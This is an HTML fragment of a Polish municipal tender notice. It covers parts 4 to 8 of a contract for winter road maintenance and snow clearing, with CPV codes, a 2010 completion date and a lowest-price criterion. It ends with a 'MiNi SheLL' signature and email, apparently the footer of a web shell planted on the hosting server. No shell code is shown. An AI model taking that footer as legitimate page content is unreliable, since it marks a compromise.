<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII.	Odśnieżanie dróg gminnych. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII.	Odśnieżanie i zwalczanie śliskości dróg według  I i II kolejności. Zakres usługi zgodnie z załączonym Kosztorysem ofertowym i warunkami SIWZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg są to prace mające na celu zmniejszenie lub ograniczenie zakłóceń ruchu drogowego wywołanych takimi czynnikami atmosferycznymi, jak śliskość zimowa oraz opady śniegu. Zasady prowadzonych prac oraz technologia robót wynikają z aktualnie obowiązujących standardów zimowego utrzymania dróg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com